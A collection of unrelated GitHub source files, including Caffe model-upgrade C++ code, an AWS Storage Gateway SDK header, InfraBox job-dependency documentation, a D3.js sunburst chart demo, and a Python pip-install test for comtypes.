" << "Manually switch the definition to 'layer' format to continue."; } bool is_fully_compatible = true; net_param->CopyFrom(v1_net_param); net_param->clear_layers(); net_param->clear_layer(); for (int i = 0; i < v1_net_param.layers_size(); ++i) { if (!UpgradeV1LayerParameter(v1_net_param.layers(i), net_param->add_layer())) { LOG(ERROR) << "Upgrade of input layer " << i << " failed."; is_fully_compatible = false; } } return is_fully_compatible; } bool UpgradeV1LayerParameter(const V1LayerParameter& v1_layer_param, LayerParameter* layer_param) { layer_param->Clear(); bool is_fully_compatible = true; for (int i = 0; i < v1_layer_param.bottom_size(); ++i) { layer_param->add_bottom(v1_layer_param.bottom(i)); } for (int i = 0; i < v1_layer_param.top_size(); ++i) { layer_param->add_top(v1_layer_param.top(i)); } if (v1_layer_param.has_name()) { layer_param->set_name(v1_layer_param.name()); } for (int i = 0; i < v1_layer_param.include_size(); ++i) { layer_param->add_include()->CopyFrom(v1_layer_param.include(i)); } for (int i = 0; i < v1_layer_param.exclude_size(); ++i) { layer_param->add_exclude()->CopyFrom(v1_layer_param.exclude(i)); } if (v1_layer_param.has_type()) { layer_param->set_type(UpgradeV1LayerType(v1_layer_param.type())); } for (int i = 0; i < v1_layer_param.blobs_size(); ++i) { layer_param->add_blobs()->CopyFrom(v1_layer_param.blobs(i)); } for (int i = 0; i < v1_layer_param.param_size(); ++i) { while (layer_param->param_size() <= i) { layer_param->add_param(); } layer_param->mutable_param(i)->set_name(v1_layer_param.param(i)); } ParamSpec_DimCheckMode mode; for (int i = 0; i < v1_layer_param.blob_share_mode_size(); ++i) { while (layer_param->param_size() <= i) { layer_param->add_param(); } switch (v1_layer_param.blob_share_mode(i)) { case V1LayerParameter_DimCheckMode_STRICT: mode = ParamSpec_DimCheckMode_STRICT; break; case V1LayerParameter_DimCheckMode_PERMISSIVE: mode = ParamSpec_DimCheckMode_PERMISSIVE; break; default: LOG(FATAL) << "Unknown blob_share_mode: " << v1_layer_param.blob_share_mode(i); break; } layer_param->mutable_param(i)->set_share_mode(mode); } for (int i = 0; i < v1_layer_param.blobs_lr_size(); ++i) { while (layer_param->param_size() <= i) { layer_param->add_param(); } layer_param->mutable_param(i)->set_lr_mult(v1_layer_param.blobs_lr(i)); } for (int i = 0; i < v1_layer_param.weight_decay_size(); ++i) { while (layer_param->param_size() <= i) { layer_param->add_param(); } layer_param->mutable_param(i)->set_decay_mult( v1_layer_param.weight_decay(i)); } for (int i = 0; i < v1_layer_param.loss_weight_size(); ++i) { layer_param->add_loss_weight(v1_layer_param.loss_weight(i)); } if (v1_layer_param.has_accuracy_param()) { layer_param->mutable_accuracy_param()->CopyFrom( v1_layer_param.accuracy_param()); } if (v1_layer_param.has_argmax_param()) { layer_param->mutable_argmax_param()->CopyFrom( v1_layer_param.argmax_param()); } if (v1_layer_param.has_concat_param()) { layer_param->mutable_concat_param()->CopyFrom( v1_layer_param.concat_param()); } if (v1_layer_param.has_contrastive_loss_param()) { layer_param->mutable_contrastive_loss_param()->CopyFrom( v1_layer_param.contrastive_loss_param()); } if (v1_layer_param.has_convolution_param()) { layer_param->mutable_convolution_param()->CopyFrom( v1_layer_param.convolution_param()); } if (v1_layer_param.has_data_param()) { layer_param->mutable_data_param()->CopyFrom( v1_layer_param.data_param()); } if (v1_layer_param.has_dropout_param()) { layer_param->mutable_dropout_param()->CopyFrom( v1_layer_param.dropout_param()); } if 
(v1_layer_param.has_dummy_data_param()) { layer_param->mutable_dummy_data_param()->CopyFrom( v1_layer_param.dummy_data_param()); } if (v1_layer_param.has_eltwise_param()) { layer_param->mutable_eltwise_param()->CopyFrom( v1_layer_param.eltwise_param()); } if (v1_layer_param.has_exp_param()) { layer_param->mutable_exp_param()->CopyFrom( v1_layer_param.exp_param()); } if (v1_layer_param.has_hdf5_data_param()) { layer_param->mutable_hdf5_data_param()->CopyFrom( v1_layer_param.hdf5_data_param()); } if (v1_layer_param.has_hdf5_output_param()) { layer_param->mutable_hdf5_output_param()->CopyFrom( v1_layer_param.hdf5_output_param()); } if (v1_layer_param.has_hinge_loss_param()) { layer_param->mutable_hinge_loss_param()->CopyFrom( v1_layer_param.hinge_loss_param()); } if (v1_layer_param.has_image_data_param()) { layer_param->mutable_image_data_param()->CopyFrom( v1_layer_param.image_data_param()); } if (v1_layer_param.has_infogain_loss_param()) { layer_param->mutable_infogain_loss_param()->CopyFrom( v1_layer_param.infogain_loss_param()); } if (v1_layer_param.has_inner_product_param()) { layer_param->mutable_inner_product_param()->CopyFrom( v1_layer_param.inner_product_param()); } if (v1_layer_param.has_lrn_param()) { layer_param->mutable_lrn_param()->CopyFrom( v1_layer_param.lrn_param()); } if (v1_layer_param.has_memory_data_param()) { layer_param->mutable_memory_data_param()->CopyFrom( v1_layer_param.memory_data_param()); } if (v1_layer_param.has_mvn_param()) { layer_param->mutable_mvn_param()->CopyFrom( v1_layer_param.mvn_param()); } if (v1_layer_param.has_pooling_param()) { layer_param->mutable_pooling_param()->CopyFrom( v1_layer_param.pooling_param()); } if (v1_layer_param.has_power_param()) { layer_param->mutable_power_param()->CopyFrom( v1_layer_param.power_param()); } if (v1_layer_param.has_relu_param()) { layer_param->mutable_relu_param()->CopyFrom( v1_layer_param.relu_param()); } if (v1_layer_param.has_sigmoid_param()) { layer_param->mutable_sigmoid_param()->CopyFrom( v1_layer_param.sigmoid_param()); } if (v1_layer_param.has_softmax_param()) { layer_param->mutable_softmax_param()->CopyFrom( v1_layer_param.softmax_param()); } if (v1_layer_param.has_slice_param()) { layer_param->mutable_slice_param()->CopyFrom( v1_layer_param.slice_param()); } if (v1_layer_param.has_tanh_param()) { layer_param->mutable_tanh_param()->CopyFrom( v1_layer_param.tanh_param()); } if (v1_layer_param.has_threshold_param()) { layer_param->mutable_threshold_param()->CopyFrom( v1_layer_param.threshold_param()); } if (v1_layer_param.has_window_data_param()) { layer_param->mutable_window_data_param()->CopyFrom( v1_layer_param.window_data_param()); } if (v1_layer_param.has_transform_param()) { layer_param->mutable_transform_param()->CopyFrom( v1_layer_param.transform_param()); } if (v1_layer_param.has_loss_param()) { layer_param->mutable_loss_param()->CopyFrom( v1_layer_param.loss_param()); } if (v1_layer_param.has_layer()) { LOG(ERROR) << "Input NetParameter has V0 layer -- ignoring."; is_fully_compatible = false; } return is_fully_compatible; } const char* UpgradeV1LayerType(const V1LayerParameter_LayerType type) { switch (type) { case V1LayerParameter_LayerType_NONE: return ""; case V1LayerParameter_LayerType_ABSVAL: return "AbsVal"; case V1LayerParameter_LayerType_ACCURACY: return "Accuracy"; case V1LayerParameter_LayerType_ARGMAX: return "ArgMax"; case V1LayerParameter_LayerType_BNLL: return "BNLL"; case V1LayerParameter_LayerType_CONCAT: return "Concat"; case V1LayerParameter_LayerType_CONTRASTIVE_LOSS: return 
"ContrastiveLoss"; case V1LayerParameter_LayerType_CONVOLUTION: return "Convolution"; case V1LayerParameter_LayerType_DECONVOLUTION: return "Deconvolution"; case V1LayerParameter_LayerType_DATA: return "Data"; case V1LayerParameter_LayerType_DROPOUT: return "Dropout"; case V1LayerParameter_LayerType_DUMMY_DATA: return "DummyData"; case V1LayerParameter_LayerType_EUCLIDEAN_LOSS: return "EuclideanLoss"; case V1LayerParameter_LayerType_ELTWISE: return "Eltwise"; case V1LayerParameter_LayerType_EXP: return "Exp"; case V1LayerParameter_LayerType_FLATTEN: return "Flatten"; case V1LayerParameter_LayerType_HDF5_DATA: return "HDF5Data"; case V1LayerParameter_LayerType_HDF5_OUTPUT: return "HDF5Output"; case V1LayerParameter_LayerType_HINGE_LOSS: return "HingeLoss"; case V1LayerParameter_LayerType_IM2COL: return "Im2col"; case V1LayerParameter_LayerType_IMAGE_DATA: return "ImageData"; case V1LayerParameter_LayerType_INFOGAIN_LOSS: return "InfogainLoss"; case V1LayerParameter_LayerType_INNER_PRODUCT: return "InnerProduct"; case V1LayerParameter_LayerType_LRN: return "LRN"; case V1LayerParameter_LayerType_MEMORY_DATA: return "MemoryData"; case V1LayerParameter_LayerType_MULTINOMIAL_LOGISTIC_LOSS: return "MultinomialLogisticLoss"; case V1LayerParameter_LayerType_MVN: return "MVN"; case V1LayerParameter_LayerType_POOLING: return "Pooling"; case V1LayerParameter_LayerType_POWER: return "Power"; case V1LayerParameter_LayerType_RELU: return "ReLU"; case V1LayerParameter_LayerType_SIGMOID: return "Sigmoid"; case V1LayerParameter_LayerType_SIGMOID_CROSS_ENTROPY_LOSS: return "SigmoidCrossEntropyLoss"; case V1LayerParameter_LayerType_SILENCE: return "Silence"; case V1LayerParameter_LayerType_SOFTMAX: return "Softmax"; case V1LayerParameter_LayerType_SOFTMAX_LOSS: return "SoftmaxWithLoss"; case V1LayerParameter_LayerType_SPLIT: return "Split"; case V1LayerParameter_LayerType_SLICE: return "Slice"; case V1LayerParameter_LayerType_TANH: return "TanH"; case V1LayerParameter_LayerType_WINDOW_DATA: return "WindowData"; case V1LayerParameter_LayerType_THRESHOLD: return "Threshold"; default: LOG(FATAL) << "Unknown V1LayerParameter layer type: " << type; return ""; } } bool NetNeedsInputUpgrade(const NetParameter& net_param) { return net_param.input_size() > 0; } void UpgradeNetInput(NetParameter* net_param) { // Collect inputs and convert to Input layer definitions. // If the NetParameter holds an input alone, without shape/dim, then // it's a legacy caffemodel and simply stripping the input field is enough. bool has_shape = net_param->input_shape_size() > 0; bool has_dim = net_param->input_dim_size() > 0; if (has_shape || has_dim) { LayerParameter* layer_param = net_param->add_layer(); layer_param->set_name("input"); layer_param->set_type("Input"); InputParameter* input_param = layer_param->mutable_input_param(); // Convert input fields into a layer. for (int i = 0; i < net_param->input_size(); ++i) { layer_param->add_top(net_param->input(i)); if (has_shape) { input_param->add_shape()->CopyFrom(net_param->input_shape(i)); } else { // Turn legacy input dimensions into shape. BlobShape* shape = input_param->add_shape(); int first_dim = i*4; int last_dim = first_dim + 4; for (int j = first_dim; j < last_dim; j++) { shape->add_dim(net_param->input_dim(j)); } } } // Swap input layer to beginning of net to satisfy layer dependencies. for (int i = net_param->layer_size() - 1; i > 0; --i) { net_param->mutable_layer(i-1)->Swap(net_param->mutable_layer(i)); } } // Clear inputs. 
  net_param->clear_input();
  net_param->clear_input_shape();
  net_param->clear_input_dim();
}

bool NetNeedsBatchNormUpgrade(const NetParameter& net_param) {
  for (int i = 0; i < net_param.layer_size(); ++i) {
    // Check if BatchNorm layers declare three parameters, as required by
    // the previous BatchNorm layer definition.
    if (net_param.layer(i).type() == "BatchNorm"
        && net_param.layer(i).param_size() == 3) {
      return true;
    }
  }
  return false;
}

void UpgradeNetBatchNorm(NetParameter* net_param) {
  for (int i = 0; i < net_param->layer_size(); ++i) {
    // Check if BatchNorm layers declare three parameters, as required by
    // the previous BatchNorm layer definition.
    if (net_param->layer(i).type() == "BatchNorm"
        && net_param->layer(i).param_size() == 3) {
      // set lr_mult and decay_mult to zero. leave all other param intact.
      for (int ip = 0; ip < net_param->layer(i).param_size(); ip++) {
        ParamSpec* fixed_param_spec =
            net_param->mutable_layer(i)->mutable_param(ip);
        fixed_param_spec->set_lr_mult(0.f);
        fixed_param_spec->set_decay_mult(0.f);
      }
    }
  }
}

// Return true iff the solver contains any old solver_type specified as enums
bool SolverNeedsTypeUpgrade(const SolverParameter& solver_param) {
  if (solver_param.has_solver_type()) {
    return true;
  }
  return false;
}

bool UpgradeSolverType(SolverParameter* solver_param) {
  CHECK(!solver_param->has_solver_type() || !solver_param->has_type())
      << "Failed to upgrade solver: old solver_type field (enum) and new type "
      << "field (string) cannot be both specified in solver proto text.";

  if (solver_param->has_solver_type()) {
    string type;
    switch (solver_param->solver_type()) {
    case SolverParameter_SolverType_SGD:
      type = "SGD";
      break;
    case SolverParameter_SolverType_NESTEROV:
      type = "Nesterov";
      break;
    case SolverParameter_SolverType_ADAGRAD:
      type = "AdaGrad";
      break;
    case SolverParameter_SolverType_RMSPROP:
      type = "RMSProp";
      break;
    case SolverParameter_SolverType_ADADELTA:
      type = "AdaDelta";
      break;
    case SolverParameter_SolverType_ADAM:
      type = "Adam";
      break;
    default:
      // Log the actual enum value; the local 'type' string is still empty here.
      LOG(FATAL) << "Unknown SolverParameter solver_type: "
                 << solver_param->solver_type();
    }
    solver_param->set_type(type);
    solver_param->clear_solver_type();
  } else {
    LOG(ERROR) << "Warning: solver type already up to date.";
    return false;
  }

  return true;
}

// Check for deprecations and upgrade the SolverParameter as needed.
bool UpgradeSolverAsNeeded(const string& param_file, SolverParameter* param) { bool success = true; // Try to upgrade old style solver_type enum fields into new string type if (SolverNeedsTypeUpgrade(*param)) { LOG(INFO) << "Attempting to upgrade input file specified using deprecated " << "'solver_type' field (enum)': " << param_file; if (!UpgradeSolverType(param)) { success = false; LOG(ERROR) << "Warning: had one or more problems upgrading " << "SolverType (see above)."; } else { LOG(INFO) << "Successfully upgraded file specified using deprecated " << "'solver_type' field (enum) to 'type' field (string)."; LOG(WARNING) << "Note that future Caffe releases will only support " << "'type' field (string) for a solver's type."; } } return success; } // Replaces snapshot_prefix of SolverParameter if it is not specified // or is set to directory void UpgradeSnapshotPrefixProperty(const string& param_file, SolverParameter* param) { using boost::filesystem::path; using boost::filesystem::is_directory; if (!param->has_snapshot_prefix()) { param->set_snapshot_prefix(path(param_file).replace_extension().string()); LOG(INFO) << "snapshot_prefix was not specified and is set to " + param->snapshot_prefix(); } else if (is_directory(param->snapshot_prefix())) { param->set_snapshot_prefix((path(param->snapshot_prefix()) / path(param_file).stem()).string()); LOG(INFO) << "snapshot_prefix was a directory and is replaced to " + param->snapshot_prefix(); } } // Read parameters from a file into a SolverParameter proto message. void ReadSolverParamsFromTextFileOrDie(const string& param_file, SolverParameter* param) { CHECK(ReadProtoFromTextFile(param_file, param)) << "Failed to parse SolverParameter file: " << param_file; UpgradeSolverAsNeeded(param_file, param); UpgradeSnapshotPrefixProperty(param_file, param); } } // namespace caffe
{ "pile_set_name": "Github" }
<!-- Any copyright is dedicated to the Public Domain. http://creativecommons.org/publicdomain/zero/1.0/ --> <!DOCTYPE html> <style> html, body { margin: 0 } svg, div { display: inline-block; width: 700px; height: 200px } div { font: 16px sans-serif; margin-left: -700px; vertical-align: 100px } div > span { margin-left: 110px } </style> <body> <svg></svg><div><span>h<span style="padding-left: 20px"></span>e<span style="padding-left: 30px"></span>llo</span></div> </body>
{ "pile_set_name": "Github" }
<!-- Content Header (Page header) --> <section class="content-header"> <div class="container-fluid"> <div class="row mb-2"> <div class="col-sm-6"> <% content_for :title, "Manufacturers - Agencies - #{current_organization.name}" %> <h1> Manufacturers <small>for <%= current_organization.name %></small> </h1> </div> <div class="col-sm-6"> <ol class="breadcrumb float-sm-right"> <li class="breadcrumb-item"><%= link_to(dashboard_path) do %> <i class="fa fa-dashboard"></i> Home <% end %> </li> <li class="breadcrumb-item"><a href="#">Manufacturers</a></li> </ol> </div> </div> </div><!-- /.container-fluid --> </section> <section class="content"> <div class="container-fluid"> <div class="row"> <!-- left column --> <div class="col-md-12"> <!-- jquery validation --> <div class="card card-primary"> <div class="card-footer"> <div class="pull-right"> <%= new_button_to new_manufacturer_path(organization_id: current_organization), text: "New Manufacturer" %> </div> </div> </div> <!-- /.card --> </div> <!--/.col (left) --> </div> <!-- /.row --> </div><!-- /.container-fluid --> <div class="container-fluid"> <div class="row"> <div class="col-12"> <!-- Default box --> <div class="card"> <div class="card-body p-0"> <table class="table"> <thead> <tr> <th>Name</th> <th>Total Diapers</th> <th class="text-center">Actions</th> </tr> </thead> <tbody> <%= render partial: "manufacturer_row", collection: @manufacturers %> </tbody> </table> </div> </div> <!-- /.card --> </div> </div> </div> <%= render( layout: "shared/csv_import_modal", locals: { title: "Import Manufacturers", csv_template_url: "/manufacturers.csv", csv_import_url: import_csv_manufacturers_path } ) do %> <li>Open the csv file with excel or your favourite spreadsheet program.</li> <li>Delete the sample data and enter the Manufacturer names, emails and phone numbers in the appropriate columns.</li> <li>Save the file as a csv file.</li> <% end %> </section>
{ "pile_set_name": "Github" }
/** * Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. * SPDX-License-Identifier: Apache-2.0. */ #pragma once #include <aws/storagegateway/StorageGateway_EXPORTS.h> #include <aws/storagegateway/StorageGatewayRequest.h> #include <aws/core/utils/memory/stl/AWSString.h> #include <aws/core/utils/memory/stl/AWSVector.h> #include <utility> namespace Aws { namespace StorageGateway { namespace Model { /** * <p>DescribeVTLDevicesInput</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/storagegateway-2013-06-30/DescribeVTLDevicesInput">AWS * API Reference</a></p> */ class AWS_STORAGEGATEWAY_API DescribeVTLDevicesRequest : public StorageGatewayRequest { public: DescribeVTLDevicesRequest(); // Service request name is the Operation name which will send this request out, // each operation should has unique request name, so that we can get operation's name from this request. // Note: this is not true for response, multiple operations may have the same response name, // so we can not get operation's name from response. inline virtual const char* GetServiceRequestName() const override { return "DescribeVTLDevices"; } Aws::String SerializePayload() const override; Aws::Http::HeaderValueCollection GetRequestSpecificHeaders() const override; inline const Aws::String& GetGatewayARN() const{ return m_gatewayARN; } inline bool GatewayARNHasBeenSet() const { return m_gatewayARNHasBeenSet; } inline void SetGatewayARN(const Aws::String& value) { m_gatewayARNHasBeenSet = true; m_gatewayARN = value; } inline void SetGatewayARN(Aws::String&& value) { m_gatewayARNHasBeenSet = true; m_gatewayARN = std::move(value); } inline void SetGatewayARN(const char* value) { m_gatewayARNHasBeenSet = true; m_gatewayARN.assign(value); } inline DescribeVTLDevicesRequest& WithGatewayARN(const Aws::String& value) { SetGatewayARN(value); return *this;} inline DescribeVTLDevicesRequest& WithGatewayARN(Aws::String&& value) { SetGatewayARN(std::move(value)); return *this;} inline DescribeVTLDevicesRequest& WithGatewayARN(const char* value) { SetGatewayARN(value); return *this;} /** * <p>An array of strings, where each string represents the Amazon Resource Name * (ARN) of a VTL device.</p> <p>All of the specified VTL devices must be * from the same gateway. If no VTL devices are specified, the result will contain * all devices on the specified gateway.</p> */ inline const Aws::Vector<Aws::String>& GetVTLDeviceARNs() const{ return m_vTLDeviceARNs; } /** * <p>An array of strings, where each string represents the Amazon Resource Name * (ARN) of a VTL device.</p> <p>All of the specified VTL devices must be * from the same gateway. If no VTL devices are specified, the result will contain * all devices on the specified gateway.</p> */ inline bool VTLDeviceARNsHasBeenSet() const { return m_vTLDeviceARNsHasBeenSet; } /** * <p>An array of strings, where each string represents the Amazon Resource Name * (ARN) of a VTL device.</p> <p>All of the specified VTL devices must be * from the same gateway. If no VTL devices are specified, the result will contain * all devices on the specified gateway.</p> */ inline void SetVTLDeviceARNs(const Aws::Vector<Aws::String>& value) { m_vTLDeviceARNsHasBeenSet = true; m_vTLDeviceARNs = value; } /** * <p>An array of strings, where each string represents the Amazon Resource Name * (ARN) of a VTL device.</p> <p>All of the specified VTL devices must be * from the same gateway. 
If no VTL devices are specified, the result will contain * all devices on the specified gateway.</p> */ inline void SetVTLDeviceARNs(Aws::Vector<Aws::String>&& value) { m_vTLDeviceARNsHasBeenSet = true; m_vTLDeviceARNs = std::move(value); } /** * <p>An array of strings, where each string represents the Amazon Resource Name * (ARN) of a VTL device.</p> <p>All of the specified VTL devices must be * from the same gateway. If no VTL devices are specified, the result will contain * all devices on the specified gateway.</p> */ inline DescribeVTLDevicesRequest& WithVTLDeviceARNs(const Aws::Vector<Aws::String>& value) { SetVTLDeviceARNs(value); return *this;} /** * <p>An array of strings, where each string represents the Amazon Resource Name * (ARN) of a VTL device.</p> <p>All of the specified VTL devices must be * from the same gateway. If no VTL devices are specified, the result will contain * all devices on the specified gateway.</p> */ inline DescribeVTLDevicesRequest& WithVTLDeviceARNs(Aws::Vector<Aws::String>&& value) { SetVTLDeviceARNs(std::move(value)); return *this;} /** * <p>An array of strings, where each string represents the Amazon Resource Name * (ARN) of a VTL device.</p> <p>All of the specified VTL devices must be * from the same gateway. If no VTL devices are specified, the result will contain * all devices on the specified gateway.</p> */ inline DescribeVTLDevicesRequest& AddVTLDeviceARNs(const Aws::String& value) { m_vTLDeviceARNsHasBeenSet = true; m_vTLDeviceARNs.push_back(value); return *this; } /** * <p>An array of strings, where each string represents the Amazon Resource Name * (ARN) of a VTL device.</p> <p>All of the specified VTL devices must be * from the same gateway. If no VTL devices are specified, the result will contain * all devices on the specified gateway.</p> */ inline DescribeVTLDevicesRequest& AddVTLDeviceARNs(Aws::String&& value) { m_vTLDeviceARNsHasBeenSet = true; m_vTLDeviceARNs.push_back(std::move(value)); return *this; } /** * <p>An array of strings, where each string represents the Amazon Resource Name * (ARN) of a VTL device.</p> <p>All of the specified VTL devices must be * from the same gateway. 
If no VTL devices are specified, the result will contain * all devices on the specified gateway.</p> */ inline DescribeVTLDevicesRequest& AddVTLDeviceARNs(const char* value) { m_vTLDeviceARNsHasBeenSet = true; m_vTLDeviceARNs.push_back(value); return *this; } /** * <p>An opaque string that indicates the position at which to begin describing the * VTL devices.</p> */ inline const Aws::String& GetMarker() const{ return m_marker; } /** * <p>An opaque string that indicates the position at which to begin describing the * VTL devices.</p> */ inline bool MarkerHasBeenSet() const { return m_markerHasBeenSet; } /** * <p>An opaque string that indicates the position at which to begin describing the * VTL devices.</p> */ inline void SetMarker(const Aws::String& value) { m_markerHasBeenSet = true; m_marker = value; } /** * <p>An opaque string that indicates the position at which to begin describing the * VTL devices.</p> */ inline void SetMarker(Aws::String&& value) { m_markerHasBeenSet = true; m_marker = std::move(value); } /** * <p>An opaque string that indicates the position at which to begin describing the * VTL devices.</p> */ inline void SetMarker(const char* value) { m_markerHasBeenSet = true; m_marker.assign(value); } /** * <p>An opaque string that indicates the position at which to begin describing the * VTL devices.</p> */ inline DescribeVTLDevicesRequest& WithMarker(const Aws::String& value) { SetMarker(value); return *this;} /** * <p>An opaque string that indicates the position at which to begin describing the * VTL devices.</p> */ inline DescribeVTLDevicesRequest& WithMarker(Aws::String&& value) { SetMarker(std::move(value)); return *this;} /** * <p>An opaque string that indicates the position at which to begin describing the * VTL devices.</p> */ inline DescribeVTLDevicesRequest& WithMarker(const char* value) { SetMarker(value); return *this;} /** * <p>Specifies that the number of VTL devices described be limited to the * specified number.</p> */ inline int GetLimit() const{ return m_limit; } /** * <p>Specifies that the number of VTL devices described be limited to the * specified number.</p> */ inline bool LimitHasBeenSet() const { return m_limitHasBeenSet; } /** * <p>Specifies that the number of VTL devices described be limited to the * specified number.</p> */ inline void SetLimit(int value) { m_limitHasBeenSet = true; m_limit = value; } /** * <p>Specifies that the number of VTL devices described be limited to the * specified number.</p> */ inline DescribeVTLDevicesRequest& WithLimit(int value) { SetLimit(value); return *this;} private: Aws::String m_gatewayARN; bool m_gatewayARNHasBeenSet; Aws::Vector<Aws::String> m_vTLDeviceARNs; bool m_vTLDeviceARNsHasBeenSet; Aws::String m_marker; bool m_markerHasBeenSet; int m_limit; bool m_limitHasBeenSet; }; } // namespace Model } // namespace StorageGateway } // namespace Aws
{ "pile_set_name": "Github" }
# Dependency Configuration

To model dependencies between jobs you simply use `depends_on` in the job definition. As an example we create three jobs `A`, `B` and `C`, where `C` depends on `A` and `B`.

```json
{
    "version": 1,
    "jobs": [{
        "name": "A",
        ...
    }, {
        "name": "B",
        ...
    }, {
        "name": "C",
        ...
        "depends_on": ["A", "B"]
    }]
}
```

Jobs `A` and `B` would start in parallel and `C` would only start if both `A` and `B` finished successfully. If either of the parent jobs failed, `C` would not be started at all. You may use dependencies with all available job types.

It's also possible to specify the required job state of the parent. So if you want to run the child job only if the parent has failed, you can do:

```json
{
    "version": 1,
    "jobs": [{
        "name": "A",
        ...
    }, {
        "name": "B",
        ...
        "depends_on": [{"job": "A", "on": ["failure"]}]
    }]
}
```

Possible values for `on` are:

- `failure`
- `finished`
- `error`
- `*` - matches all of the above (`failure`, `finished`, `error`)

So if you have a cleanup job which you want to run always, independent of the parent state, use `*` (see the sketch at the end of this page).

### Transfer data between jobs

If you have defined dependencies between your jobs you can also transfer data between them. The parent job may produce some output which the child job may access. Every InfraBox job automatically has an output folder mounted under `/infrabox/output`. All data written into this directory will be accessible by the direct child jobs. In the child job the data is made accessible under the `/infrabox/inputs/<parent_job_name>` directory.

Suppose we have the following job definition:

```json
{
    "version": 1,
    "jobs": [{
        "name": "parent",
        ...
    }, {
        "name": "child",
        ...
        "depends_on": ["parent"]
    }]
}
```

If the parent job created the file `/infrabox/output/hello_world.txt`, then the child job would be able to access it under `/infrabox/inputs/parent/hello_world.txt`.
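To make the wildcard state concrete, here is a minimal sketch that combines the features described above: a `cleanup` job that runs once its parent has reached any terminal state. The job names (`build`, `test`, `cleanup`) and the elided `...` fields are placeholders for illustration, not part of any real project definition.

```json
{
    "version": 1,
    "jobs": [{
        "name": "build",
        ...
    }, {
        "name": "test",
        ...
        "depends_on": ["build"]
    }, {
        "name": "cleanup",
        ...
        "depends_on": [{"job": "test", "on": ["*"]}]
    }]
}
```

With `"on": ["*"]`, `cleanup` starts as soon as `test` ends, regardless of whether it finished, failed or errored, while `test` itself still only runs after a successful `build`.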
{ "pile_set_name": "Github" }
//+build !windows,!solaris,!darwin package dbus import ( "os" ) const defaultSystemBusAddress = "unix:path=/var/run/dbus/system_bus_socket" func getSystemBusPlatformAddress() string { address := os.Getenv("DBUS_SYSTEM_BUS_ADDRESS") if address != "" { return address } return defaultSystemBusAddress }
{ "pile_set_name": "Github" }
/* ------------------------------------------------------------------------------
 *
 * # D3.js - sunburst diagram combined
 *
 * Demo sunburst diagram setup with interactive zoom and data update combination
 *
 * Version: 1.0
 * Latest update: August 1, 2015
 *
 * ---------------------------------------------------------------------------- */

$(function () {

    // Initialize Uniform plugin
    $('.combined-options input').uniform({
        radioClass: 'choice'
    });

    // Initialize chart
    sunburstZoomable('#d3-sunburst-combined', 400, 400);

    // Chart setup
    function sunburstZoomable(element, width, height) {

        // Basic setup
        // ------------------------------

        // Define main variables
        var radius = Math.min(width, height) / 2;


        // Construct scales
        // ------------------------------

        // Horizontal
        var x = d3.scale.linear()
            .range([0, 2 * Math.PI]);

        // Vertical
        var y = d3.scale.sqrt()
            .range([0, radius]);

        // Colors
        var color = d3.scale.category20();


        // Create chart
        // ------------------------------

        var svg = d3.select(element).append("svg")
            .attr("width", width)
            .attr("height", height)
            .append("g")
            .attr("transform", "translate(" + width / 2 + "," + height / 2 + ")");


        // Construct chart layout
        // ------------------------------

        // Partition layout
        var partition = d3.layout.partition()
            .sort(null)
            .value(function(d) { return 1; });

        // Arc
        var arc = d3.svg.arc()
            .startAngle(function(d) { return Math.max(0, Math.min(2 * Math.PI, x(d.x))); })
            .endAngle(function(d) { return Math.max(0, Math.min(2 * Math.PI, x(d.x + d.dx))); })
            .innerRadius(function(d) { return Math.max(0, y(d.y)); })
            .outerRadius(function(d) { return Math.max(0, y(d.y + d.dy)); });


        // Load data
        // ------------------------------

        // Keep track of the node that is currently being displayed as the root.
        var node;

        d3.json("assets/demo_data/d3/sunburst/sunburst_basic.json", function(error, root) {
            node = root;

            // Append sunburst
            var path = svg.datum(root).selectAll(".d3-sunbirst")
                .data(partition.nodes)
                .enter()
                .append("path")
                .attr("class", "d3-sunbirst")
                .attr("d", arc)
                .style("fill", function(d) { return color((d.children ? d : d.parent).name); })
                .on("click", click)
                .each(stash);

            // Change data
            d3.selectAll(".combined-options input").on("change", function change() {
                var value = this.value === "count"
                    ? function() { return 1; }
                    : function(d) { return d.size; };

                // Transition
                path
                    .data(partition.value(value).nodes)
                    .transition()
                    .duration(750)
                    .attrTween("d", arcTweenData);
            });

            // Animate on click
            function click(d) {
                node = d;
                path.transition()
                    .duration(750)
                    .attrTween("d", arcTweenZoom(d));
            }
        });

        // Setup for switching data: stash the old values for transition.
        function stash(d) {
            d.x0 = d.x;
            d.dx0 = d.dx;
        }

        // When switching data: interpolate the arcs in data space.
        function arcTweenData(a, i) {
            var oi = d3.interpolate({x: a.x0, dx: a.dx0}, a);
            function tween(t) {
                var b = oi(t);
                a.x0 = b.x;
                a.dx0 = b.dx;
                return arc(b);
            }
            if (i == 0) {
                // If we are on the first arc, adjust the x domain to match the root node
                // at the current zoom level. (We only need to do this once.)
                var xd = d3.interpolate(x.domain(), [node.x, node.x + node.dx]);
                return function(t) {
                    x.domain(xd(t));
                    return tween(t);
                };
            } else {
                return tween;
            }
        }

        // When zooming: interpolate the scales
        function arcTweenZoom(d) {
            var xd = d3.interpolate(x.domain(), [d.x, d.x + d.dx]),
                yd = d3.interpolate(y.domain(), [d.y, 1]),
                yr = d3.interpolate(y.range(), [d.y ? 20 : 0, radius]);
            return function(d, i) {
                return i
                    ? function(t) { return arc(d); }
                    : function(t) { x.domain(xd(t)); y.domain(yd(t)).range(yr(t)); return arc(d); };
            };
        }
    }
});
{ "pile_set_name": "Github" }
"""This test covers 'pip install' issue #155""" import os import sys import shutil import subprocess import unittest def read_version(): # Determine the version number by reading it from the file # 'comtypes\__init__.py'. We cannot import this file (with py3, # at least) because it is in py2.x syntax. for line in open("comtypes/__init__.py"): if line.startswith("__version__ = "): var, value = line.split('=') return value.strip().strip('"').strip("'") raise NotImplementedError("__version__ is not found in __init__.py") class TestPipInstall(unittest.TestCase): def setUp(self): """prepare the same package that is usually uploaded to PyPI""" subprocess.check_call([sys.executable, 'setup.py', 'sdist', '--format=zip']) filename_for_upload = 'comtypes-%s.zip' % read_version() self.target_package = os.path.join(os.getcwd(), 'dist', filename_for_upload) self.pip_exe = os.path.join(os.path.dirname(sys.executable), 'Scripts', 'pip.exe') def test_pip_install(self): """Test that "pip install comtypes-x.y.z.zip" works""" subprocess.check_call([self.pip_exe, 'install', self.target_package]) def test_no_cache_dir_custom_location(self): """Test that 'pip install comtypes-x.y.z.zip --no-cache-dir --target="...\custom location"' works""" custom_dir = os.path.join(os.getcwd(), 'custom location') if os.path.exists(custom_dir): shutil.rmtree(custom_dir) 